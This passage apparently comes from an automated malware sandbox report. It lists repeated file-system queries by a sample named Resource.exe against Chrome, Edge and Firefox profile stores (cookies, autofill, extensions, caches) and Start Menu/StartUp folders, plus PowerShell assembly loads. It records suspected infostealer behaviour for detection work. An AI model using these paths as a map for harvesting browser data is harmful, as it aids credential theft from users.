              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
